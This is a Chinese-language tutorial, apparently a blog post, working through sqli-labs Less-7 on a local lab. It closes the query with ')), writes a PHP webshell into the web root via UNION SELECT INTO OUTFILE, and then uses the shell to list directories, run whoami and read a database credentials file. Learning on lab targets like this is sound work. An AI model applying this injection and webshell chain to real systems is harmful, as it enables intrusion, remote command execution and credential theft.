sqli-labs靶场第七关——文件导出注入

一:目标

通过sql注入将php代码写入网站目录,通过这个php文件执行命令

二:确认前置条件

%secure_file_priv%

首先我们需要Mysql是否允许导出文件

先尝试在网页中sql注入,检查导出权限

sql 复制代码
?id=1')) union select 1,@@secure_file_priv,3-- -

检查失败

换方法,通过Mysql命令行直接执行:

win+r→powershell→mysql -u root -p→password

然后检查:

php 复制代码
show variables like '%secure_file_priv%';

窗口显示如下

这里value有三种可能的值:

  • Null:禁止所有导入导出操作(最严格)

  • 空字符串'':允许所有目录的导入导出(有安全风险)

  • 指定路径:只允许该目录下的文件操作

如果值是空or是路径,继续攻击

如果值为NULL,那么注入一定失败,需要我们修改配置 ,方法如下:

在你的Mysql文件夹里找到my.ini,从段落的中间部分找到 [mysqld],在下面一行加上

sql 复制代码
secure_file_priv = ""

保存,服务里面重启动Mysql,然后 win+r→powershell→mysql -u root -p→password,再次检查

可以看到Value值变成空,说明我们修改成功了 ~

三:确定注入类型

首先输入 ?id=1',报错

尝试单引号+括号,?id=1'),报错

尝试?id=1'))--+,页面恢复正常!!

所以这一关要闭合 '))

四:写一个webshell文件

首先用order by确定有三行

payload:

sql 复制代码
http://localhost/sqli-labs/Less-7/?id=1')) union select 1,
'<?php system($_GET["cmd"]);?>',
3 
into outfile
'D:/nginx-1.27.5/html/shell.php'-- -

php代码:<?php system($_GET["cmd"]);?>

路径按照网站的真实路径来

**注意:路径使用双反斜杠\\

into outfile 文件导出:

sql 复制代码
select 内容 into outfile '文件路径';

使用条件:

1.Mysql有权限

2.知道目标路径的物理路径

3.secure_file_priv允许操作

列出网站目录:

sql 复制代码
http://localhost/shell.php?cmd=dir D:\nginx-1.27.5\html\  

这里面可以看出我们的绝对路径是否正确

这样显示更清楚一点

sql 复制代码
http://localhost/shell.php?cmd=dir

整理我们得到的数据!

sql 复制代码
D:\nginx-1.27.5\html\  # 当前目录路径
├── 50x.html           # Nginx错误页面
├── index.html         # 默认首页
├── index.php          # PHP入口文件
├── shell.php          # 刚写入的WebShell
└── sqli-labs/         # SQLi-Labs靶场目录

再来几个查询!

查看服务器用户名

sql 复制代码
http://localhost/shell.php?cmd=whoami

读取数据库配置文件(获取账号密码)

sql 复制代码
http://localhost/shell.php?cmd=type D:\nginx-1.27.5\sqli-labs\sql-connections\db-creds.inc

❀❀❀ 完结撒花!! ❀❀❀

相关推荐
宁小法9 小时前
PHP 数组 如何将新元素加到数组第一个位置(支持指定key => value)
php·数组·首个元素
他们叫我技术总监9 小时前
Oracle数据库常见问题实战:从连接错误到自动清理空闲会话
数据库·oracle
菲兹园长11 小时前
MySql(SQL)
数据库·sql·mysql
一只小bit11 小时前
MySQL表的操作:创建—修改—删除流程解析
数据库·mysql·oracle
做运维的阿瑞11 小时前
PostgreSQL 从入门到精通:Windows 环境下安装与使用指南
数据库·windows·postgresql
学编程的小鬼11 小时前
MySQL的快速入门
数据库·mysql
_Power_Y11 小时前
MySql复习及面试题学习
数据库·学习·mysql
学习编程的Kitty11 小时前
MySQL——数据类型和表的操作
数据库·mysql
witkey_ak989611 小时前
网安面试题收集(1)
网络安全
程序新视界11 小时前
MySQL中,日期、时间与时间戳三种数据类型的区别
数据库·后端·mysql